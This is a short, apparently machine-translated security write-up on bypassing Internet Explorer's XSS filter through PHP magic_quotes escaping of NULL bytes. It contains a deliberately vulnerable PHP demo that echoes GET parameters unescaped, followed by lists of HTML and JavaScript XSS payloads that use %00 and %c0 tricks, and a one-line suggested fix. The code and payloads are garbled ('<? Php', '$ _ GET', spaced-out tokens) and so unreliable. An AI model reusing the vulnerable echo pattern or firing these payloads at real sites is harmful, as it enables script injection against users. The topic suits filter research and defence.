PHP magic quotes cause ie xss Filter bypass

In some web containers, some special characters will be converted. In this case, the ie xss filter developer has neglected its understanding at any place, which may lead to bypass.
In php, if the "magic quotes" feature (magic_quotes_gpc = On) is enabled, then '(single-quote),' (double quote), \ (backslash) and NULL characters will be escaped by the backslash (% 00 => \ 0 ).
 
1. xss. php demo source code:
 
 
<? Php echo $ _ GET ['X']?>
<Script type = "text/javascript">
Var x = "<? Php echo $ _ GET ['Z']?> "
</Script>
 
2. HTML bypass case:
 
<Script> alert (1) </script>
<Script/% 00% 00% 00% 00> alert (1) </script>
% 00% 00 v % 00% 00 <script> alert (1) </script>
<Script/% 00% 00 v % 00% 00> alert (1) </script>
 
Tips:
1. the bypass characters must appear in the interception rules. For example, <script> can be <script [here]>.
 
3. Javascript bypass case:
 
 
"; Alert (1 )//
% C0 "; alert (% 00 )//
% C0 "; // (% 0 dalert (1 )//
% C0 "; // (% 0 dalert (1 )//
% C0 "; // (% 00% 0 dalert (1 )//
% C0 "// (% 000000% 0 dalert (1 )//
 
Tips: www.2cto.com
 
1. You need to eat \.
2. // (% 000000% 0d is the interception rule used to bypass function calls.
 
 
 
Solution:

Add the % 00 => \ 0 rule. Of course, this may cause other problems.